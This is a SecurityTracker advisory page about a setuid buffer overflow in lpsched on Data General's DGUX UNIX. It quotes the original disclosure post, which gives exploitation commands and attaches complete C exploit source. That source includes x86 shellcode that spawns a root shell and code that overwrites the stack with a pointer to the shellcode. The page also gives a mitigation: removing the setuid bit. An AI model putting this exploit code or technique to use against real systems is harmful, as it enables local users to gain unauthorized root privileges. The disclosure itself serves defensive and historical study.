SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   OS (UNIX)  >   Lpsched Vendors:   Data General
Data General's DGUX UNIX Operating System Can Give Local Users Root-Level Privileges Through a Vulnerability in the Lpsched Utility
SecurityTracker Alert ID:  1001135
SecurityTracker URL:  http://securitytracker.com/id/1001135
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 22 2001
Impact:   Denial of service via local system, Root access via local system

Version(s): DGUX version R4.20MU06 and MU02 (ia32 arch).
Description:   A vulnerability has been reported in Data General's UNIX implementation (DGUX) Lpsched facility that can give local users root-level access.

If a very long, non-existant, printer name is passed to the program lpsched, a buffer overflow will occur when lpsched attempts to format an error message.

Demonstration exploit code is available (see the original source message for more information).

Impact:   A local user could gain additional privileges, as lpsched is typically installed with set userid privileges.
Solution:   No solution was available at the time of this entry. The author recommends removing the setuid bit for lpsched (chmod -s /usr/lib/lp/lpsched).
Vendor URL:  www.dg.com (Links to External Site)
Cause:   Boundary error
Underlying OS:  UNIX (DGUX)

Message History:   None.


 Source Message Contents

Subject:  DGUX lpsched buffer overflow


--9amGYk9869ThD9tj
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline


Hi there!

There's a vulnerability in DG's UNIX implementation (DGUX), version R4.20MU06
and MU02 (ia32 arch).

The problem is when a very long, non-existant, printer name is passed to the
program lpsched. It tries to format an error message and then the buffer
overflow occurs...

Data General was told about the vulnerability over almost two years ago (as the
computer department of my university, Universidade do Minho, Portuga). Or at
least I tried to, but didn't get an answer from any email address I tried.

I didn't post this to bugtraq before because I forgot about it. Brownsing from
old archives of mine I found this and decided to post it.

How to exploit:
	- Use the attached exploit program like this:
		./squash-dgux-x86 29000 /usr/lib/lp/lpsched -S EGG
		(if the 29000 doesn't work, try 27428 or other numbers)
	- Details of the shell code and the vulnerability can be found in
		http://strange.nsk.yi.org/squash-dgux-x86/
	- Unfortunantely I have no longer access to a DGUX system, so I can't
		find more vulnerabilities...

Fix:
	- chmod -s /usr/lib/lp/lpsched
	- switch to a better UNIX like system (sorry, dgux people)

hugs
	Luciano Rocha

--9amGYk9869ThD9tj
Content-Type: text/plain; charset=us-ascii
Content-Description: squash-dgux-x86.c
Content-Disposition: attachment; filename="squash-dgux-x86.c"

/******************************************************************************
 *		Stack Smasher by Luciano Rocha, (c) 1999                      *
 *		 for dgux (Data General's UN*X) on x86                        *
 *									      *
 *	To compile: cc -o squash-dgux-x86 squash-dgux-x86.c		      *
 *									      *
 *	To use: squash-dgux-x86 <length> <program to squash> [params of prog] *
 *			EGG [other params of prog]			      *
 *									      *
 *	For a list of programs and their respective lengths see my home page, *
 *		currently at http://strange.nsk.yi.org/                       *
 *									      *
 *	My email: strange@nsk.yi.org					      *
 *									      *
 *	Disclaimer: I take no responsability of whatever may result of using  *
 * 		this program nor I sugest ilegal use of it.		      *
 *			You are on your own.				      *
 ******************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>

char maker[] = "Generic stack-smasher for dgux-x86 by Luciano Rocha, (c) 1999.\n";

char sc[] = {
	'E', 'G', 'G', '=',
	0x33, 0xc0, 0x33, 0xc9, 0x80, 0xc1, 0x68, 0x66, 0x51, 0x66, 0x68, 0x2f,
	0x73, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x8b, 0xdc, 0x50, 0x53, 0x80, 0xc1,
	0xdf, 0x66, 0x51, 0x50, 0x66, 0xba, 0x90, 0x9a, 0x66, 0x52, 0x66, 0x68,
	0x33, 0xc0, 0x66, 0x51, 0x50, 0x66, 0x52, 0x66, 0x68, 0x90, 0x58, 0x66,
	0x51, 0x50, 0x66, 0x52, 0x8b, 0xcc, 0x8b, 0xd3, 0x81, 0xc2, 0xf8, 0xff,
	0xff, 0xff, 0x52, 0x52, 0x53, 0x50, 0x04, 0x11, 0x50, 0x51, 0x04, 0x25,
	0xc3, 0x00
};

int prepare2(int argc, char *argv[]) {
	int len, off;
	char *buff;
	
	if (argc < 4) {
		fprintf(stderr, "%s <size> <prog_to_smash> [args] EGG "
			"[args].\n", argv[0]);
		exit(1);
	}
	for (off = 1; off < argc && strcmp(argv[off], "EGG"); ++off);
	if (off >= argc) {
		fprintf(stderr, "%s: no EGG parameter specified. Aborting.\n",
				argv[0]);
		exit(1);
	}
	len = strtol(argv[1], NULL, 0);
	buff = (char *) malloc(len + 1);
	buff[len] = '\0';
	memset(buff, 0x90, len);
	putenv(sc);
	argv[off] = buff;
	execv(argv[0], argv+2);
	perror(argv[0]);
	return 1;
}

int dosquash(int argc, unsigned char *argv[]) {
	char *p;
	int pos, ptr;
	int *d;

	p = getenv("EGG");
	fprintf(stderr, "%s: EGG == %p, EGG[0] == 0x%x\n", argv[0], p, *p);
	pos = 1;
	while (argv[pos] && *argv[pos] != 0x90) ++pos;
	if (!argv[pos]) {
		fprintf(stderr, "%s: no place to squash...\n", argv[0]);
		exit(0);
	}
	d = (int *) argv[pos];
	ptr = (int) p;
	while (*d == 0x90909090) *d++ = ptr;
	execv(argv[0], argv);
	perror(argv[0]);
	return 1;
}

int main(int argc, char *argv[]) {

	if (getenv("EGG")) dosquash(argc, (unsigned char **)argv);
	else prepare2(argc, argv);
	return 1;
}

--9amGYk9869ThD9tj--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC